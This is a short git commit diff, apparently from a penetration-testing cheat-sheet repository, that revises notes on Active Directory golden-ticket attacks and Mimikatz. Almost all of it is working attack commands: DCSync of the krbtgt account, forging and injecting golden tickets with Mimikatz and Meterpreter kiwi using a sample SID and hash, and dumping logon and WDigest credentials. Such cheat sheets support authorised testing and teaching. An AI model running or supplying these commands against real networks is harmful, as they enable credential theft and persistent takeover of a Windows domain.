Fix Golden Ticket

gazcbm · Apr 15, 2018 · f62d466 · f62d466
1 parent b8fbca3
commit f62d466
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 6 deletions.
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -44,26 +44,31 @@
 
   Metasploit : windows/gather/credentials/domain_hashdump
   ```
-  * Golden Tickets
+  * Golden Tickets    
+  Mimikatz version
   ```c
   Get info - Mimikatz
   lsadump::dcsync /user:krbtgt
   lsadump::lsa /inject /name:krbtgt
 
-  Get info - Meterpreter(kiwi)
-  dcsync_ntlm krbtgt
-
   Forge a Golden ticket - Mimikatz
   kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
   kerberos::tgt
+  ```
 
-  Forge a Golden ticket - Metasploit
-  post/windows/escalate/golden_ticket
+  Meterpreter version
+  ```c
+  Get info - Meterpreter(kiwi)
+  dcsync_ntlm krbtgt
+  dcsync krbtgt
 
   Forge a Golden ticket - Meterpreter
   load kiwi
+  golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
   golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
+  kerberos_ticket_purge
   kerberos_ticket_use /root/Downloads/pentestlabuser.tck
+  kerberos_ticket_list
   ```
   * Kerberoast
     ```c
@@ -87,6 +92,7 @@
 ```
 load mimikatz
 mimikatz_command -f sekurlsa::logonPasswords full
+mimikatz_command -f sekurlsa::wdigest
 ```
 
 ## PowerSploit

diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
@@ -13,6 +13,7 @@ Mimikatz console (multiple commands)
 PS C:\temp\mimikatz> .\mimikatz
 mimikatz # privilege::debug
 mimikatz # sekurlsa::logonpasswords
+mimikatz # sekurlsa::wdigest
 ```
 
 Mimikatz Golden ticket